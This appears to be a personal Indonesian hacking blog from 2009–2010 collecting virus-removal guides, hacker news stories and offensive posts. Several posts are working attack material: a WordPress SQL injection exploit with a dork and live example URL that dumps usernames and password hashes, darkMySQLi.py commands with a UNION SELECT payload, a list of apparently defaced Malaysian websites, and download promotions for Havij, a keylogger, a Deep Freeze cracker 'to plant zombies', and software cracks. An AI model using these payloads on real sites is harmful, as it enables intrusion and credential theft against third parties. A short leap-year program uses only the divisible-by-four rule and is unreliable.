HKLM, Software\CLASSES\comfile\shell\open\command,,,”"”%1″” %*”

HKLM, Software\CLASSES\exefile\shell\open\command,,,”"”%1″” %*”

HKLM, Software\CLASSES\piffile\shell\open\command,,,”"”%1″” %*”

HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”

HKLM, Software\CLASSES\scrfile\shell\open\command,,,”"”%1″” %*”

HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255

HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0x000000ff,255

6. Hapus File induk dan file duplikat yang dibuat oleh virus termasuk di flash disk. Untuk mempercepat proses pencarian, Anda dapat menggunakan fungsi ‘Search’. Sebelum melakukan pencarian sebaiknya tampilkan semua file yang tersembunyi dengan mengubah pada setting Folder Options.

Jangan sampai terjadi kesalahan pada saat menghapus file induk maupun file duplikat yang telah dibuat oleh virus. Lalu hapus file induk virus yang mempunyai ciri-ciri:

-. Icon ‘Microsoft Visual Basic Project’.
-. Ukuran File 128 KB (untuk varian lain akan mempunyai ukuran yang bervariasi).
-. Ekstesi file ‘.EXE’ atau ‘.SCR’.
-. Type file ‘Application’ atau ‘Screen Saver’.

Kemudian hapus File duplikat shortcut yang mempunyai ciri-ciri:

>. Icon Folder atau icon
>. Ekstensi .LNK
>. Type File ‘Shortcut’
>. Ukuran file 1 KB

Hapus juga file yang .DLL (contoh: ert.dll) dan file Autorun.inf di flash disk atau folder yang di-share. Sementara untuk menghindari virus tersebut aktif kembali, hapus file induk yang mempunyai ekstensi EXE atau SCR terlebih dahulu baru kemudian hapus file Shortcut (.LNK).

7. Tampilkan kembali folder yang telah disembunyikan oleh virus. Untuk mempercepat proses tersebut, silahkan download tools UnHide File and Folder di http://www.flashshare.com/bfu/download.html.

Setelah diinstall, pilih direktori [C:\Documents and settings] dan folder yang ada di flash disk dengan cara menggeser ke kolom yang sudah tersedia. Pada menu [Attributes] kosongkan semua pilihan yang ada, kemudian klik tombol [Change Attributes].

8. Install security patch ‘Microsoft Windows Shell shortcut handling remote code execution vulnerability-MS10-046′. Silakan download security patch tersebut di http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx

Seperti biasa, untuk pembersihan secara optimal dan menecegah infeksi ulang, sebaiknya install dan scan dengan antivirus yang up-to-date dan sudah dapat mendeteksi virus ini dengan baik.

Original source: vaksin[dot]com & detikinet[dot]com

CARA 2 MENGHAPUS VIRUS SHORTCUT:

Ciri-ciri virus shortcut :

Pertama-tama, setelah menginfeksi komputer, dia akan membuat file induk database.mdb di My Documents

Yang kedua adalah virus tersebut akan membuat file autorun.inf di setiap drive harddisk, flash disk, dan folder tanpa kecuali.

Yang ketiga adalah dia akan membuat file Thumb.db (hati-hati, perhatikan bahwa file ini tanpa huruf s sedangkan thumbnail cache yang asli di komputer memiliki tambahan huruf s alias thumbs.db) di setiap folder

Untuk memancing korban, dia akan membuat file Microsoft.lnk dan New Harry Potter and….lnk di setiap folder yang jika dieksekusi akan langsung mengaktifkan virus tersebut.

Seperti halnya virus-virus lokal lainnya, dia akan membuat duplikat setiap folder namun kali ini bukan dengan ekstensi .exe melainkan extensi .ink alias shortcut.

Pada task manager terdapat proses services wscript.exe yang sedang berjalan. Dalam kondisi normal, tidak ada proses seperti ini.

Langkah-langkah menghapus virus shortcut :

1. Matikan System Restore. Sejak dulu saya selalu mematikan system restore segera setelah proses instalasi windows. Untuk keperluan backup dan imaging system, saya lebih memilih menggunakan third party seperti acronis ataupun Norton Ghost (baca dan dowload : Norton Ghost 15.0.0.35659 (2010) Full Serial Crack)

2. Matikan proses virus wsrcipt.exe (C:\WINDOWS\System32\wscript.exe)

Bisa menggunakan Process Explorer atau misc. tool pada HijackThis (baca dan download : HijackThis 2.0.2 ).

3. Hapus file virus database.mdb di My Documents..

4. Hapus file duplikat virus..

Untuk proses penghapusan, anda bisa menggunakan fasilitas search pada Windows.. Pada “More advanced options”, pastikan option “Search system folders” dan “Search hidden files and folders” keduanya telah dicentang.

Search file dengan nama autorun.inf ukurannya 8 KB

Search file dengan nama Thumb.db ukurannya 8 KB

Search file dengan ekstensi .lnk.lnk ukurannya 1 KB

Hapus semua file yang ditemukan..

Untuk lebih memudahkan proses pencarian yang sekaligus menghapus file yang ditemukan, anda bisa menggunakan software UTool, sebuah freeware yang dapat anda download secara gratis. Program ini akan secara otomatis mencari dan kemudian menghapus file-file yang diinginkan (lihat gambar).

5. Hapus registry Autorun yang dibuat virus dengan menggunakan HijackThis..

Cari di bagian HKCU\..\Run: yang berhubungan dengan file database.mdb (pada gambar namun file database.mdb udah saya hapus)

regedit_run

Untuk lebih memantabkan proses pencegahan dan melindungi komputer kita dari serangan virus lokal yang sangat memusingkan ini, anda dapat melakukan hal-hal berikut:

1. Setelah proses instalasi windows, segera matikan system restore.

2. Install software third party misal Tweak UI atau Magic Tweak untuk mendisable autorun dan mencegah teraktivasinya file-file .inf. Mungkin pada Windows XP Professional, proses menon-aktifkan autorun bisa dilakukan dengan mudah, namun pada versi Win XP Home, anda memerlukan software ini. Tambahan informasi, program MagicTweak selain berfungsi menon-aktifkan autorn dapat juga digunakan untuk mencegah dijalankannya file-file .inf File autorun.inf yang biasanya merupakan awal dari berjangkitnya virus akan secara otomatis diubah menjadi murni file txt alias notepad oleh program ini dan dia tidak lagi bisa dieksekusi. Ini sangat membantu jika memang secara tidak sengaja kita mengaktifkan atau mengeksekusi autorun.inf meski proses autorun sudah didisable untuk semua drive (termasuk flash disk).

3. Setelah semua proses instalasi windows, driver, program, dan lain-lain telah selesai, segera backup image system anda menggunakan software macam Acronis True Image atau Norton Ghost, sehingga jika nanti ada masalah yang tidak dapat anda selesaikan dengan mudah, anda dapat merestoreasi backup system tersebut.

4. Jika perlu, instal juga Deep Freeze apabila komputer anda digunakan oleh banyak orang, sehingga settingan komputer tidak akan berubah-ubah.

5. Update info: Ciri-ciri virus terdapatnya virus shortcut pada flashdisk dapat diketahui dengan perbedaan icon flashdisk tersebut yang biasanya berbentuk seperti icon drive menjadi berubah seperti icon folder. Jika menemui icon seperti ini, berarti dalam flashdisk tersebut terdapat virus. Gunakan explorer dan buka flashdisk lewat explorer (jangan klik 2x dari my computer) dan hapus file autorun dan file2 tersangka virus lainnya secara manual dengan menekan shift + DEL (supaya tidak tersangkut di recycle bin). Rata-rata virus lokal dapat dicegah dengan cara manual seperti ini asalkan OPSI DISABLE AUTORUN pada windows dan/atau MagicTweak telah diaktifkan, dan juga OPSI DISABLE .INF FILE pada MagicTweak telah diaktifkan.

Nah, itu mungkin sedikit tips cara menghapus virus shortcut dan smoga komputer kamu setelah hapus virus shortcut jadi bebas deh dari virus shortcut.

Original source: maswafa[dot]blogger[dot]com

Ingin Kembali ke Masa Lalu

2010-10-31T11:14:00.001+07:00

Kembali ke Masa Lalu memang terdengar bahwa kita lari dari kenyataan. Lari dari masalah - masalah yang sedang kita hadapi. Namun apabila kita dapat kembali kemasa lalu, maka kita pun dapat merubah semuanya menjadi indah. Andai gw bisa kemasa lalu, gw akan memperbaiki semua untuk lebih baik lagi. Sekarang gw hidup dihantui penyesalan mendalam, rasa penyesalan yang gak akan pernah hilang seumur hidup gw.

Akankah ada mesin waktu yang membawa kita kemasa lalu ?

Akankah ada perbaikan dari setiap kesalahan kita ?

Bisakah kita memperbaiki yang sudah terjadi ?

Bisakah kita dapatkan kebahagiaan yang seharusnya kita dapat ?

Mungkin itu hanya khayalan manusia, mungkin juga hanya harapan. Setiap orang pasti berharap dan berusaha agar hidupnya selalu bahagia, hidup tanpa dihantui penyesalan seumur hidupnya. Sekarang gw hanya bisa bersedih setiap hari, hanya bisa meratapi apa yang sudah terjadi, hanya bisa menyesali seumur hidup gw.
Apa yang harus gw lakukan ?
Apa yang harus gw perbuat ?
Apa ini hukuman untuk gw ?

Merayakan Kemerdekaan MALINGSHIT

2010-08-31T12:21:00.000+07:00

http://www.jawhar.gov.my/

http://niaganetwork.com/

http://pkgcheras.net/

http://www.vivaownersclub.net/index/

http://www.smkbertamindah.com/

http://skseribiram.net/portal/

http://skkjb.com/forum/

http://tbga.com.my/atmailopen/

http://suria-medik.com/v3/

http://lkpimsel.org.my/media/

http://www.ejannlex.com/

http://skseripaka.com/media/

http://qaiyum.net/images/

http://www.saktie.com/images/

http://www.nextproevents.com.my/logs

http://realbisnes.com/media/

http://oasis.com.my/images/

http://peladangjbselatan.org/portal/media

http://my-trade-center.com/media/

http://nuraina.com/deletethispics1/

http://lubukforex.com/mambots/

http://kabasystem.com/v2/

http://mk2020.com/hm/

http://www.ilmuone.com/myshop/

http://kelochor.com/gallery/

http://jomfly.com/jomflydata/

http://www.justinloh.com/images/

http://station4all.com/temp/Indonesia.html

http://www.hrsb.com.my/kelnet2/

http://eplan.com.my/mgmt/Indonesia.html

http://myhalal2u.biz/media/Indonesia.html

http://3dproperty.my/Indonesia.html

http://www.e-informasi.com/images/Indonesia.html

http://bynetsolution.com/amt/Indonesia.html

http://www.dr-ag.net/Indonesia.html

http://easybezz.com/media/Indonesia.html

http://www.calvinzworld.com/gallery/Indonesia.html

http://www.ciptadigital.com/ctrm/Indonesia.html

http://dailyfreshfoods.com/old_2/Indonesia.html

http://funnyaims.com/components/Indonesia.html

http://www.absoluteborneo.com/photo/Indonesia.html

http://prolelaki.com/language/Indonesia.html

http://alvinontherocks.com/wp-content-old2/uploads/Indonesia.html

http://www.amana2u.biz/shop/Indonesia.html

http://www.ammpcentre.com/documents/Indonesia.html

http://ibafconference.com/Indonesia.html

http://www.aqleader.com.my/gallery_images/Indonesia.html

http://autoshowspray.com/gambar2/Indonesia.html

http://basixmicrosystems.com/logs/Indonesia.html

http://butiknini.com/Indonesia.html

http://diarinini.com/wp-content/Indonesia.html

http://mohdlutfi.com/Indonesia.html

http://www.bijakkomputer.com/deadlock/Indonesia.html

http://pijai.telagapictures.com/Indonesia.html

http://cikgumuzik.com/media/Indonesia.html

Simple SQL Injection With Havij

2010-08-10T18:26:00.000+07:00

Tools havij membuat kita lebih mudah melakukan SQL injection.
Langsung aja yang mau download KLIK DISINI dan untuk tutorialnya silahkan liat-liat forum atau videonya ada di Youtube juga.

Acong, Hacker Insaf yang Suka Berbagi

2010-02-22T12:08:00.002+07:00

Ia tak tahu pasti sudah berapa ribu server yang telah ia jebol. Sebagai seorang peretas, Juny Maimun memang gemar sekali masuk ke server orang. Bukan untuk mengeruk keuntungan, namun sekadar untuk mempelajari source code aplikasi, atau desain sebuah database.

Itu adalah Juny Maimun yang dulu. Pria yang kerap disapa Acong itu, beberapa tahun lalu memang aktif di komunitas 'bawah tanah' AntiHackerlink. Di kalangan peretas, ia dikenal dengan nama nick 'Bagan'.

Tapi Acong sudah tobat. Ia tak mau lagi merugikan orang lain. Sebagai penganut agama Budha taat, Acong percaya betul dengan Karma. Kini, ia tengah mengembangkan bisnisnya di bidang teknologi informasi yang tengah berkembang pesat.

"Sekarang saya cuma pingin nebus dosa," kata Acong, saat diwawancara VIVAnews di Gedung Cyber, Jakarta, Rabu 17 Februari 2010. Bahkan, ia justru menyeru rekan-rekan sesama hacker yang salah jalan, untuk insaf kembali ke 'jalan yang benar'.

Pelan-pelan, pria kelahiran Bagan Siapi-api, 29 tahun lalu itu, mengajak teman-teman cracker (hacker kriminil) untuk beralih menjadi pengusaha konten, pengembang aplikasi, atau bergabung dalam proyek-proyek yang ia kerjakan.

"Apa sih yang didapat dari aktivitas hacking?" Pertanyaan itu biasanya ia lontarkan untuk menyadarkan teman sejawat peretasnya. Sebab, Acong yakin, walau kegiatan carding (menjebol kartu kredit orang lain) bisa membuahkan hasil yang sepadan dengan harga sebuah kapal pesiar, namun hasil uang panas itu akan cepat 'menguap' tak tersisa.

Kini, Acong sibuk dengan tiga proyek yang ia jalankan. Yakni, bisnis warung internet (warnet), usaha penyediaan jasa internet (ISP), dan menjalankan situs bagi pakai file, foto, dan musik: Indowebster.

Usaha warnet sudah ditekuni sejak Acong masih kuliah di New College Stamford. Dari pertama Acong hanya punya satu warnet, kini, bekerja sama dengan rekannya, ia mengoperasikan sekitar tujuh buah warnet. Selain bisnis warnet, Acong juga memiliki ISP bernama Maxindo Mitra Solusi.

Sementara Acong mulai terjun ke dunia web saat mendirikan forum khusus bagi para pecinta game, bernama Indogamers. Di forum ini, Acong juga mendorong anggota komunitas untuk tak cuma berdiskusi, tapi juga berani membuat server game.

Kemudian, sekitar 3 tahun lalu, Acong mendirikan sebuah situs bagi pakai file bernama Indofile. Dari kocek pribadinya, Acong menginvestasikan dana sekitar Rp 50 juta untuk membeli server untuk keperluan situs bagi pakai file.

Situs ini bertahan selama setahun. Hingga pada akhirnya, Acong mengubah Indofile menjadi Indowebster. Konsepnya juga mengalami perubahan. "Indowebster merupakan perpaduan dari Rapidshare, ImageShack, dan YouTube," kata Acong.

Jadi tak sekadar mengunduh dan mengunggah file, tapi pengguna juga bisa mengunggah foto dan video di Indowebster. Ke depan Acong sedang mempersiapkan sebuah strategi baru untuk memperluas layanan Indowebster, yaitu menyediakan layanan TV internet.

Uniknya, tak seperti pengusaha web lain yang mengejar profit atau keuntungan, dalam mengelola Indowebster, Acong sama sekali tak mau menarik keuntungan dari situs web ini. Sebab, hal ini terkait erat dengan filosofi yang dipegang teguh oleh Acong: Internet adalah tempat berbagi, sehingga tak sepatutnya bila sebuah situs web mengutip keuntungan.

Walaupun tak mengkomersialkan Indowebster, Acong tak pernah takut situs itu bangkrut, karena untuk membiayai operasional Indowebster, Acong mengambilnya dari berbagai keuntungan yang ia dapatkan dari bisnis ISP dan proyek-proyek yang ia kerjakan bersama tim pengembangan mereka.

"Kebaikan yang kita lakukan pasti akan membawa feedback. Semakin kita berbagi, semakin kita akan mendapatkan sesuatu. Kenapa musti takut berbagi?" kata Acong. Buktinya, kata dia, total investasi dari perangkat-perangkat yang dimiliki Indowebster, kini sudah mencapai paling tidak Rp 1,3 miliar.

Menurut Acong, praktek berbagi yang ia terapkan merupakan pengejawantahan dari prinsip Open Source. Ia sangat mendukung penyebaran ilmu atau teknologi secara terbuka dan cuma-cuma, sehingga semua orang bisa menikmatinya.

"Kalau semua orang go open source, tidak ada orang yang kelaparan. Sebab, open source membuka peluang kontribusi kepada semua orang, tidak hanya kepada orang atau kalangan tertentu saja. Dunia akan lebih sejahtera dengan open source," kata suami dari Wiwik Huang itu.

Tip berbagi dan keterbukaannya itu ternyata tidak hanya dipraktekan pada urusan bisnis semata. Acong juga menerapkannya saat berinteraksi dengan para karyawan. Ia memberikan kesempatan yang sangat besar kepada karyawan-karyawannya untuk maju.

Alim Bachtiar, 19 tahun, adalah salah satu buktinya. Empat tahun lalu, pemuda kelahiran Boyolali itu adalah juru parkir, saat pertama kali bekerja di warnet milik Acong. Namun, Alim yang 'cuma' jebolan SMP itu, kini memegang tanggung jawab menangani core routing koneksi wireless ke klien Maxindo.

"Tak selalu membutuhkan titel pendidikan yang tinggi untuk sebuah tanggung jawab yang besar. Semua orang bisa mempelajari teori, tapi pengalaman adalah sesuatu yang paling bernilai," kata Acong.

Saat diwawancara VIVAnews, Rabu 17 Februari 2010, Alim mengatakan bahwa Acong tak pernah membeda-bedakan orang berdasarkan agama, ras, etnis, dan lain-lain. Acong sering membantu menyiarkan siaran langsung sebuah acara pengajian majelis taklim, ke situs Indowebster.

Tak hanya itu, selama ia bekerja, Alim mengaku tak pernah dibentak atau mengalami perlakuan kasar dari Acong. "Saya bangga punya atasan Pak Acong," kata Alim. Tak terbatas urusan kerjaan, Acong bahkan juga kerap menjadi sasaran curhat Alim, saat ia sedang ada masalah keluarga.

Bagi Acong sendiri, menjadi pengusaha di bidang TI seperti saat ini bukan cita-citanya sejak kecil, karena Acong mengaku tak pernah punya cita-cita di waktu kecil. Hanya saja, pekerjaannya saat ini memang sangat cocok dengan kegemaran dasarnya, yaitu menyediakan sesuatu untuk digunakan orang lain.

"Bila sesuatu yang kita sediakan bermanfaat bagi orang lain, rasanya ada kepuasan tersendiri," ujar hacker tobat itu dengan kalem.

Sumber : http://www.vivanews.com

7 Langkah mengusir "Virus Mbah Surip"

2010-02-08T18:47:00.000+07:00

Awalnya dari temen gw casper X-code chat ke gw ketika gw lagi asik googling,,dia bilang komputernya kena virus yang dikenal Virus Mbah Surip. Ketika gw tanya apa akibat dari virus itu gw kaget juga,,ternyata sadist juga itu virus....Langsung aja gw minta tolong Mbah Google,,eh dapet deh link detiknet.com .

Virus VBS/Cryf.A. atau yang lebih terkenal dengan sebutan virus 'Mbah Surip' memang cukup merepotkan. Mulai dari disusupi album porno, CD/DVD Rom komputer korban juga dibuat selalu terbuka.

Bagaimana cara untuk mengusir virus yang populer dengan lagu 'Tak Gendong' itu? Berikut 7 kiat singkatnya yang diramu vaksincom:

1. Matikan proses virus yang sedang aktif di memori. Untuk mematikan proses virus ini silahkan gunakan tools pengganti task manager seperti Currproses, kemudian matikan proses yang mempunyai product name 'Microsoft (r) Windows Script Hosta' dengan cara:

* Pilih [blok] proses yang mempunyai product name 'Microsoft (r) Windows Script Hosta'
* Klik kanan pada proses yang sudah di blok
* Pilih [Kill Selected Processes]

2. Blok agar file virus tidak dapat dijalankan untuk sementara selama proses pembersihan dengan menggunakan fitur 'Software Restriction Policiesa', fitur ini hanya ada di Windows XP/2003/Vista/2008. Untuk blok file tesebut lakukan langkah berikut:

* Klik menu [Start]
* Klik [Run]
* Pada dialog box [Run], ketik SECPOL.MSC kemudian klik tombol [OK]
* Pada layar [Local Security Policy], klik [Software restriction policies]
* Klik kanan pada [software restriction policies] dan pilih [Create new policies]
* Kemudian klik kanan di [Additional Rule], dan pilih [New Hash Rule].
* Di Kolom [File Hash], klik tombol [Browse] dan pilih file yang akan diblok. Pada kolom [File information] akan terisi informasi dari file tersebut secara otomatis.
* Pada Security Level pilih [Disallowed]
* Pada kolom 'descriptiona' isi deskripsi dari nama file tersebut (bebas),

3. Fix Registry dengan menjalankan file [FixRegistry.exe], silahkan download di alamat berikut http://www.4shared.com/file/117095567/3ea8e8ce/_4__FixRegistry.html

4. Hapus file induk virus yang telah dibuat. File induk virus ini akan disembunyikan. Jika file induk tersebut tidak dapat ditampilkan silahkan gunakan tools penggganti Windows Explorer seperti 'Explorer XP'. Silahkan download di alamat berikut:
http://www.explorerxp.com/explorerxpsetup.exe

Setelah software tersebut di install, cari dan hapus file berikut: svchost.vbs, desktop.ini, drvconfg.drv. SHELL32.dll, %Drive%:\Album BOKEP\Naughty America dan C:\windows.

5. Tampilkan file [TaskMgr.exe/Regedt32.exe/Regedit.exe/CMD.exe/Logoff.exe] yang disembunyikan oleh virus, caranya:

* Start]
* Klik [Run]
* Ketik CMD kemudian klik tombol [OK]
* Pada layar 'Dos Prompt' pindahkan posisi kursor ke drive yang akan di periksa
* Ketik perintah ATTRIB regedit.exe kemudian klik tombol
* Kemudian ketik perintah saya yang membedakan hanya nama file yang akan ditampilkan yakni Taskmgr.exe, cmd.exe dan Logoff.exe

6. Untuk pembersihan optimal dan mencegah infeksi ulang silahkan install dan scan dengan antivirus yang up-to-date.

7. Jika komputer sudah benar-benar bersih dari virus, hapus rule blok file [WSCript.exe] yang telah dibuat pada langkah nomor 2, caranya:

* Klik menu [Start]
* Klik [Run]
* Pada dialog box [Run], ketik SECPOL.MSC kemudian klik tombol [OK]
* Pada layar [Local Security Policy], klik 2x [Software restriction policies]
* Klik [Additional Rule]
* Hapus Rule yang pernah Anda buat sebelumnya

Nah itu tips kali ini... semoga berkenan ya......

Sumber : detikinet.com

WordPress (?event_id=) Sql Injection Vulnerability

2010-02-01T20:37:00.002+07:00

WordPress (?event_id=) Sql Injection Vulnerability
==========================================================

###########################################
.:. Author         : vhesckot_1601

.:. Email          : vhesckot@gmail.com

.:. Team           : Underground

.:. Home           : www.tecon-crew.org

.:. Script         : WordPress

.:. Script Download: http://wordpress.org/download/html

.:. Bug Type       : Sql Injection [Mysql]

.:. Dork           :"powered by WordPress" inurl:"/?event_id="

.:. Date           : 01/2/2010

#############################################

===[ Exploit ]===

www.site.com/?event_id=[Sql]

www.site.com/Path/?event_id=[Sql]

Exploit:

null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

Example :

http://curecmd.org/events/event-details?event_id=-22+union+select%201,concat%28user_login,0x3a,user_pass%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+wp_users

==========================================================
Greats T0 : Indonesian Hacker

KeYLoGGeR

2010-01-22T16:43:00.001+07:00

KeyLogger.......

Apaan seh keylogger itu ????
KeyLogger biasa digunakan untuk merekam kerja keyboard pada komputer.

Buat Apaan seh ???
KeyLogger biasa digunakan beberapa oknum untuk mendapatkan data penting dari target.
Tapi sebagian digunakan untuk kebaikan juga koq, contohnya kalo gw yang pake itu.

Bahaya gak seh untuk komputer ???
Wah dari pengalaman yang udah sering gw gunakan seh gak bahaya. Gak ngerusak system komputer.
Tapi gak tau juga deh kalo ada virus juga yg dikasih nama keylogger, pasti ngerusak tuh.

Dimana seh donLodnya ???
Wah gw pake yang FamiLy KeYLoGGeR.
KLIK SINI

Tools Menjebol Deep Freeze

2010-01-05T20:42:00.000+07:00

Biasa banyak warnet menggunakan Deep Freeze untuk mengamankan clientnya dari tindak kejahatan dan menjaga kapasitas penyimpanan HDD pada computer client. Seiring berjalannya waktu dan kemajuan tekhnologi, Deep Freeze pun menjadi incaran sehingga ada programmer yang menciptakan Undeep Freeze. Dari namanya saja sudah bisa diketahuin bahwa Undeep Freeze adalah salah satu program penghilang/penjebol password Deep Freeze. Langsung aja kita Download 2 toolsnya DISINI dan DISINI JUGA. Oke deh setelah itu terserah kalian deh mau ngapain. Kalo gw seh buat tanem zombie biar punya pegangan. Hahahaha.....!!!

Mengamankan upload.php

2009-11-14T04:38:00.002+07:00

Script upload.php terkadang masih ada yang bisa kita upload dengan type file apapun. Disinilah terkadang kecerobohan terjadi. Berikut source yang dilengkapi dengan filter file type dan file_exists, yakni filter file type adalah saringan agar file tertentu saja yang dapat diupload sedangkan file_exists gunanya mendeteksi upload file yang sama.
Berikut source sederhananya. Langsung aja deh download disini.

Sumber : http://ilmukomputer.org/

Perakitan Komputer (PC)

2009-11-11T05:50:00.000+07:00

Tutorial perakitan komputer untuk pemula yang masih awam dengan komponen dan cara merakit komputer.

Download disini.

Program Tahun Kabisat

2009-11-09T01:36:00.001+07:00

#include "stdio.h"
#include "conio.h"
main()
{
int tahun;

printf("Program Tahun Kabisat \n");
printf("\n");
printf("Masukkan Tahun : ");
scanf("%d", &tahun);
printf("\n");

if (tahun %4 == 0)
{
printf("Tahun %d adalah Tahun Kabisat", tahun);
}
else
{
printf("Tahun %d bukan Tahun Kabisat", tahun);
}

getch();
}

3 Hacker yang Paling Beken di Dunia

2009-10-30T01:24:00.002+07:00

Dunia hacker sudah dikenal sejak adanya komputer, dan mereka mulai lebih meraja-lela sejak adanya internet. Nah kalau kamu penasaran siapa saja Hacker yang paling beken di dunia, artikel ini akan bisa menjawabnya.

1. Kevin Mitnick (lahir 6 Agustus 1963)

Kevin dikenal karena aksi hackernya yang cukup menghebohkan Amerika, dan merupakan "the most wanted computer criminal in United States history". Kisah hidupnya sempat di-filmkan sebanyak 2 kali di Hollywood, dengan judul 'Takedown' dan 'Freedom Downtime'.

Kevin memulai aksi hackernya pertama kali terhadap sistem transportasi di Los Angeles. Setelah berhasil menjebol sistem 'punchcard' (pembacaan kartu langganan bus), dia bisa memakai bus kemana saja secara gratis. Aksi berikutnya Kevin adalah menjebol sistem telepon, dimana dia bisa menggunakan layanan telepon jarak jauh dengan gratis.

Setelah mengenal komputer, Kevin sempat melakukan hacking pada:
- DEC (Digital Equipment Corporation) system
- IBM Mini Komputer di 'Computer Learning Center Los Angeles'
- Hacking sistem Motorola, NEC, Nokia, Sun Microsystems dan Fujitsu Siemens
- Mengelabui FBI

Kevin akhirnya bisa tertangkap dan menjalani hukuman penjara 5 tahun. Dirinya baru dibebaskan pada tahun 2000. Setelah bebas, dia tidak diperbolehkan memakai perangkat telekomunikasi dan telepon hingga tahun 2003. Setelah Kevin menggugat haknya di pengadilan, akhirnya dirinya diperbolehkan menggunakan alat komunikasi dan komputer. Saat ini Kevin bekerja sebagai seorang konsultan sekuriti komputer.

2. Adrian Lamo (lahir 1981)

Adrian adalah seorang jurnalis dan seorang hacker berpredikat 'abu-abu' (bisa baik, bisa jahat), terutama dikenal dalam hacking serangkaian jaringan komputer yang mempunyai tinggi keamanan tinggi.

Dirinya mulai dikenal orang setelah berhasil menjebol sistem komputer 'The New York Times' pada tahun 2002 dan 'Microsoft'. Dia juga dikenal dapat mengidentifikasi kekurangan dalam keamanan jaringan komputer dari perusahaan yang termasuk dalam daftar 'Fortune 500 companies' dan kemudian memberitahu mereka kelemahan dan celah yang dia ditemukan.

Kasus ini sempat diteliti oleh FBI selama 15 bulan, setelah New York Times melaporkan adanya sistem mereka yang dijebol. Akhirnya diketahui pada tahun 2003 bahwa penyebabnya adalah Adrian. Adrian sempat bersembunyi beberapa hari, dan akhirnya menyerahkan diri ke FBI pada tahun 2004.

Adrian akhirnya harus menjalani hukuman 'tahanan rumah' oleh orang tuanya, dan 2 tahun masa percobaan dengan denda sekitar $65,000. Adrian juga diyakini berusaha menjebol sistem komputer Yahoo!, Sun Microsystem, Bank of America, dan CitiGroup, dengan memanfaatkan celah keamanan yang ada.

3. Jonathan James (lahir 12 Desember 1983)

James adalah orang Amerika Serikat termuda yang dijatuhi hukuman atas kejahatan dunia cyber. Saat baru umur 16 tahun dia dikirim ke penjara karena menjebol situs departemen pertahanan Amerika.

Dirinya mengakui melakukan hacking adalah sebuah tantangan dan merupakan salah satu kesenangan tersendiri. NASA juga kena getah buah dari keisengannya, James berhasil mencuri (download) software NASA yang diperkirakan bernilai $1.7 juta dollar AS pada tahun 1999. NASA harus dipaksa untuk mematikan server dan sistemnya akibat dari perbuatan si James selama tiga minggu. Dan setelah itu NASA harus mengelaurkan biaya sekiatar $41,000 untuk membetulkan sistemnya yang dijebol.

6 bulan setelah James menjebol NASA, dia diciduk di rumahnya oleh polisi setempat pada jam 6 pagi. Dia menjalani hukuman penjara 6 bulan karena masih di bawah umur, dan hukuman percobaan 'tahanan rumah' hingga umurnya mencapai 21 tahun. James tidak diperbolehkan untuk berinterkasi dengan komputer selama itu.

James meninggal dunia pada tanggal 18 Mei 2008, tidak ada informasi apa yang menyebabkan kematiannya.

Sumber:
http://cahpamulang.blogspot.com/2008/12/3-hacker-yang-paling-beken-di-dunia.html

Hacker (Cracker) Indonesia, Penjahat atau Pahlawan kah?

2009-10-30T01:01:00.000+07:00

Cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki seperti: pencurian data, penghapusan, dan banyak yang lainnya. Sedangkan hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer. hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

Yang jelas, bisa dipastikan seorang cracker adalah hacker, namun belum tentu seorang hacker menjadi seorang cracker. Judul di atas saya tulis dengan tanda kurung antara seorang cracker dan juga seorang hacker dari Indonesia, karena memang tidak (belum) jelas apa yang telah dilakukannya itu menjadikan ia seorang hacker, ataukah malah sebaliknya, menjadi seorang cracker.

Postingan ini adalah wujud dari rasa heran, takjub, sekaligus kagum saya kepada para hacker (atau cracker) yang telah “berulah” di dunia maya (baca: internet) dengan menyerang situs-situs “mereka” atau musuh-musuh “kita”. Untuk lebih jelasnya saya mengutip beberapa berita yang dilansir oleh detikInet berikut ini.

sumber:
http://www.rismaka.net/2009/04/hacker-cracker-indonesia-penjahat-atau-pahlawan-kah.html

Crack Windows Vista Life Time

2009-10-21T16:12:00.001+07:00

Crack Vista....????
Bagaimana seh caranya????
Ok,,gw akan share sedikit yang gw tau....!!!
Mungkin cara ini udah lama banget,,gw yakin para master udah pada tau.
Kalo newbie seperti gw ini cuma mau share buat sesama newbie neh master...
Mohon koreksi jika ada kesalahan.....!!!!

Klik Disini buat sedot video tutorialnya.....!!!!

REILUKE ADMIN FINDER

2009-10-17T05:41:00.001+07:00

REILUKE ADMIN FINDER adalah salah satu tools pencari halaman login admin pada suatu website.
Tools ini sangat mudah di operasikan dan sangat berguna bagi para newbie seperti saya untuk bisa masuk kedalam web setelah mendapatkan username dan password. Disamping itu, database untuk pencarian halaman admin dapat kita upgrade sendiri agar hasilnya lebih memuaskan. Tools tersebut dapat kalian download DISINI.

SQL Injection With darkMySQLi.py

2009-10-15T14:10:00.003+07:00

Salah satu tools hacking yang berguna dan salah satu senjata andelan gw adalah darkMySQLi.py yang sangat berguna untuk versi 5. Dia bisa dijalankan asal dikomputer kita udah diinstall python. Gw seh rekomendasikan python 2.5 or python 2.6 karena itu yang gw pake di komputer gw. Download pythonnya yang sesuai kompi kalian disini.

Sistem kerjanya kita panggil dari cmd.
Panggil darkMySQLi.py lewat cmd.

example :
C:\.....\.....>........\darkMySQLi.py -u "(target yg ada bug)" --findcol
(Untuk melihat banyaknya column dan menampilkan darkc0denya)
http://www.target.com/services.php?serviceID=7+AND+1=2+UNION+SELECT+1,darkc0de,3,darkc0de,5,6--

C:\.....\.....>........\darkMySQLi.py -u "(target yg udah keluar darkc0de)" --full
(untuk menampilkan semua table dan column pada database)

C:\.....\.....>........\darkMySQLi.py -u "(target yg ada bug)" --dump -D (nama databasenya) -T (nama table) -C (column,column)
